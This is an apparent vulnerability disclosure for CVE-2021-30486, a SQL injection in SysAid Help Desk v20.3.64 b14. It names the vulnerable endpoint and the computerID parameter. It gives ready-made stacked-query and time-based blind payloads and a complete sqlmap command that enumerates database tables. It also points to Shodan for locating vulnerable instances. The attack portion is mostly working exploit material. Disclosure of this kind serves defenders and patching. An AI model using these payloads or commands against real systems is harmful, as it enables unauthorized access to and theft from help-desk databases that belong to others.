SysAID II – SQLI [CVE-2021-30486]

SysAid Technologies (formerly Ilient) is an international company founded in 2002 that develops and provides IT Service Management software. SysAid Technologies is a privately owned company, founded by Israel Lifshitz (also founder of NUBO Software).

SysAID Help Desk System v20.3.64 b14.

The exploitation of vulnerability requires having user-level access in the system. From the «Asset Management» option, the request is captured at the time of selecting a data from Control ListBox.

Affected files:

Method: GET
Parameter: computerID

Method: POST
Parameter: group1

Method: GET
Parameter: computerID, group1

Method: GET
Parameter: group1

When loading the chart, it will send the POST request from the «AssetManagementChart.jsp» with the parameter: «ComputerID (String),» Gorup1 (Integer) «

We will use the parameter «ComputerID» to exploit the BLIND and Stacker SQL vulnerability using SQLMAP.

It is possible to exploit with two injection techniques with their respective payloads:

Stacked queries:
PAYLOAD: computerID=<VALUE>’;WAITFOR DELAY ‘0:0:4’–&group1=Server&group2=&group1Name=computer_type&group2Name=null&viewName=Servers and Network devices&displayValue=<BASE64@VALUE>&source=2&chartItemType=0&period=day


Time-based blind:
PAYLOAD: computerID=<VALUE>’ WAITFOR DELAY ‘0:0:4’– cnxC&group1=Server&group2=&group1Name=computer_type&group2Name=null&viewName=Servers and Network devices&displayValue=<BASE64@VALUE>=&source=2&chartItemType=0&period=day


sqlmap -u ‘<HOST>:80/AssetManagementChart.jsp?computerID=<VALUE>&group1=Server&group2=&group1Name=computer_type&group2Name=null&viewName=Servers%20and%20Network%20devices&displayValue=@BASE64@<VALUE-BASE64>&source=2&chartItemType=0&period=day’ –level=5 –risk=3 -p ‘computerID’ –random-agent –is-dba –threads=2 –hex -o -v 3 –time-sec=4 –tamper=between,unmagicquotes,charencode –cookie='<COOKIE>;accountId=<VALUE>;userType=<VALUE>’ –tables

Product: SysAid Help Desk EE
Discovered: 30-03-2021
Vulnerable version: SYSAID v20.3.64 b14 (and Previous)

The vulnerable version in Shodan search engine.

CVE ID: CVE-2021-30486